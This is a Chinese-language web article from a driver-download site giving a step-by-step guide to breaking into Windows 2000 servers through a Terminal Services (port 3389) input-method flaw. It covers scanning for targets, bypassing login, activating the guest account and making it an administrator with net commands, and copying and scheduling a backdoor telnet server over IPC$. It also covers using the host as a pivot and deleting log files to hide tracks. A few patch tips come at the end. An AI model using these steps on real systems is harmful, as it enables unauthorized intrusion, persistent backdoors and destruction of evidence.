驱动管家:安全、高效、精准的专业驱动下载站!

攻击3389端口的方法有哪些?3389端口的入侵步骤

2018-01-14 19:42:27责编:llp   来源:驱动管家     人气:

WIN2000中文简体版存在的输入法漏洞,可以使本地用户绕过身分验证机制进入系统内部。经实验,WIN2000中文简体版的终端服务,在远程操作时仍然存在这一漏洞,而且危害更大。

WIN2000的终端服务功能,能使系统管理员对WIN2000进行远程操作,采用的是图形界面,能使用户在远程控制计算机时功能与在本地使用一样,其默认端口为3389,用户只要装了WIN2000的客户端连接管理器就能与开启了该服务的计算机相联。因此这一漏洞使终端服务成为WIN2000的合法木马。

工具:客户端连接管理器

攻击3389端口的方法有哪些?3389端口的入侵步骤

入侵步骤: 一,获得管理员账号。

我们先对一个网段进行扫描,扫描端口设为3389,运行客户端连接管理器,将扫描到的任一地址加入到,设置好客户端连接管理器,然后与服务器连结。几秒钟后,屏幕上显示出WIN2000登录界面(如果发现是英文或繁体中文版,放弃,另换一个地址),用CTRL SHIFT快速切换输入法,切换至全拼,这时在登录界面左下角将出现输入法状态条(如果没有出现,请耐心等待,因为对方的数据流传输还有一个过程)。用右键点击状态条上的微软徽标,弹出“帮助”(如果发现“帮助”呈灰色,放弃,因为对方很可能发现并已经补上了这个漏洞),打开“帮助”一栏中“操作指南”,在最上面的任务栏点击右键,会弹出一个菜单,打开“跳至URL”。此时将出现WIN2000的系统安装路径和要求我们填入的路径的空白栏。比如,该系统安装在C盘上,就在空白栏中填入"c:\winnt\system32"。然后按“确定”,于是我们就成功地绕过了身份验证,进入了系统的SYSTEM32目录。

现在我们要获得一个账号,成为系统的合法用户。在该目录下找到"net.exe",为"net.exe"创建一个快捷方式,右键点击该快捷方式,在“属性”->“目标”->c:\winnt\system32\net.exe后面空一格,填入"user

guest /active :yes"点“确定”。这一步骤目的在于用net.exe激活被禁止使用的guest账户,当然也可以利用"user

用户名 密码/add",创建一个新账号,但容易引起网管怀疑。运行该快捷方式,此时你不会看到运行状态,但guest用户已被激活。然后又修改该快捷方式,填入"user

guest 密码",运行,于是guest便有了密码。最后,再次修改,填入“localgroup administrators guest

/add,将guest变成系统管理员。

注意事项:1、在这过程中,如果对方管理员正在使用终端服务管理器,他将看到你所打开的进程id,你的ip和机器名,甚至能够给你发送消息。

2、终端服务器在验证你的身份的时候只留给了你一分钟的时间,在这一分钟内如果你不能完成上述操作,你只能再连结。

3、你所看到的图像与操作会有所延迟,这受网速的影响。二,创建跳板。

再次登录终端用务器,以"guest"身份进入,此时guest已是系统管理员,已具备一切可执行权。打开“控制面板”,进入“网络和拔号连接”,在“本地连接”或“拔号连接”中查看属性,看对方是否选择“Microsoft

网络的文件和打印机共享”,如果没有,就打上勾。对方如果使用的是拔号上网,下次拔号网络共享才会打开。退出对方系统,在本地机命令提示符下,输入 net use

\\IP Address\IPC$ ["password"] /user:"guset",通过IPC的远程登陆就成功了。

登陆成功之后先复制一个Telnet的程序上去(小榕流光安装目录下的Tools目录里的Srv.exe,另外,还有ntml.xex,一会要用),这个程序是在对方上面开一个Telnet服务,端口是99。

copy c:\hack\srv.exe \\***.***.***.***\admin$ 然后利用定时服务启动它,先了解对方的时间: net time

\\***.***.***.*** 显示: \\***.***.***.*** 的当前时间是 2001/1/8 下午 08:55 命令成功完成。

然后启动srv.exe: at \\***.***.***.*** 09:00 srv.exe  显示: 新加了一项作业,其作业 ID = 0

过几分钟后,telnet ***.***.***.*** 99 这里不需要验证身份,直接登录,显示: c:\winnt:\system32>

我们就成功登陆上去了。然后又在本地打开命令提示符,另开一个窗口,输入: copy c:\hack\ntlm.exe

\\211.21.193.202\admin$ 把事先存放在hack目录里的ntlm.exe拷过去。然后又回到刚才的telnet窗口,运行ntlm.exe

C:\WINNT\system32>ntlm 显示: Windows 2000 Telnet Dump, by Assassin, All Rights

Reserved. Done! C:\WINNT\system32>C:\WINNT\system32>

好,现在我们来启动WIN2000本身的telnet,首先终止srv.exe的telnet服务: net stop

telnet 系统告诉你并没有启动telnet,不理它,继续: net start

telnet 这次真的启动了telnet,我们可以在另开的命令提示符窗口telnet到对方的

23端口,验证身份,输入我们的guest账号和密码,它就真正成为我们的跳板了。我们可以利用它到其它的主机去。三、扫除脚印: 删除为net.exe

创建的快捷方式,删除winnt\system32\logfiles下边的日志文件补漏方法: 1、打补丁 2、删除输入法帮助文件 3、停止终端服务

  • 人们需要知道有关后门程序的三大技术知识

    人们需要知道有关后门程序的三大技术知识

    曾经饱受木马、后门(以下统称后门)侵害的人们都不会忘记机器被破坏后的惨象,于是人们展开了积极的防御工作,从补丁到防火墙,恨不得连网线都加个验证器,在多种多样的防御手法夹攻下,一大批后门倒下了,菜鸟们

    详情2018-01-06 18:19:03责编:llp   来源:驱动管家     
  • windows的文件夹怎么加密?文件加密的方法

    windows的文件夹怎么加密?文件加密的方法

    个人信息安全,尤其是公共电脑,隐私保护就很重要了。如何让你文件夹看起来更个性,信息更安全?使用更方便呢?在本文中编辑将给大家介绍这方面的技巧,一定会让你的系统看起来更加有个性,使用更方便,信息更安

    详情2018-01-05 14:12:43责编:llp   来源:驱动管家     
  • 杀毒软件有哪些误区?杀毒软件的九大误区

    杀毒软件有哪些误区?杀毒软件的九大误区

    杀毒软件几乎是每台电脑的必须品,随着电脑技术的日益提高,几乎每个用电脑的人都遇到过计算机病毒,因此杀毒软件也是比不可少的。但是,对病毒和杀毒软件的认识许多人还存在着误区。杀毒软件虽然可以帮助电脑拦

    详情2018-01-08 11:32:15责编:llp   来源:驱动管家     
  • 手机炸弹是什么?手机炸弹程序是怎样的?

    手机炸弹是什么?手机炸弹程序是怎样的?

    下载一个手机炸弹软件随便输入一个手机号码然后选择次数之类的利用WSockExpert_Cn exe监听手机炸弹得出http: sms 98960 com pages user-newlogin asp?number=13088170991原来手机炸弹只不过是一个URL循环提交的

    详情2018-01-09 16:51:51责编:llp   来源:驱动管家     
  • 短信验证码诈骗 警惕短信木马程序窃取信息

    短信验证码诈骗 警惕短信木马程序窃取信息

    本以为有了手机短信验证应该很安全了,没想到银行卡里的钱还是能被刷走,关键是一条短信都没收到。到底是怎么回事?原来是手机木马搞得鬼,很多奇怪的第三方软件作为木马拦截你的短信,发送到黑客的邮箱,然后转

    详情2018-01-10 11:34:19责编:llp   来源:驱动管家     
  • 验证码识别的原理是什么?验证码识别怎么破解?

    验证码识别的原理是什么?验证码识别怎么破解?

    对于比较复杂的验证码,比如DZ论坛最新的验证码,处理起来相对麻烦一些,但是原理还是和普通的识别一样的,无非多了个背景处理的方案,看如下对DZ论坛的验证码的识别的思路首先我们要去除它的背景,对于这样稍微

    详情2018-01-03 13:52:23责编:llp   来源:驱动管家     
  • 设置wep加密的无线网络密码怎么破解?

    设置wep加密的无线网络密码怎么破解?

    近些年无线技术发展迅速,越来越多的用户使用无线设备在自己家建立起无线网络,通过搭建无线网络可以在家里的每个角落使用笔记本和无线网卡访问internet。有很多文章都向大家介绍了无线安全之中的通过设置WEP加密

    详情2018-01-13 16:24:37责编:llp   来源:驱动管家     
  • 怎么利用ldap服务器攻击网站?ldap服务器攻击的威力

    怎么利用ldap服务器攻击网站?ldap服务器攻击的威力

    大家都知道前不久出现的DDoS攻击“Mirai”,导致美国半数的互联网瘫痪,是不是很厉害啊,现在下面就为大家介绍一个最新的DDoS攻击,要让DDoS攻击力更彪悍。LDAP据Corero网络安全公司披露,上周发现一种新型DDoS攻

    详情2018-01-03 18:56:56责编:llp   来源:驱动管家     
  • flash动画不能正常播放怎么破解?反编译flash怎么做?

    flash动画不能正常播放怎么破解?反编译flash怎么做?

    我记得san以前学英语的时候搞过一批新东方的flash,于是找到他当时写的文档看了一下。这才知道,原来flash也是可以反编译的。

    详情2018-01-11 14:03:35责编:llp   来源:驱动管家     
  • 网络安全知识 揭秘网络安全的五个误区

    网络安全知识 揭秘网络安全的五个误区

    网络安全越来越成为一个大问题,网络安全事故和个人隐私数据泄露的频发,我们不得不对自己的信息加以保护,一起来看看网络安全自己的一系列误区吧。选择一个话题,什么话题都行,始终有一些人信以为真的误区和无

    详情2018-01-08 17:58:17责编:llp   来源:驱动管家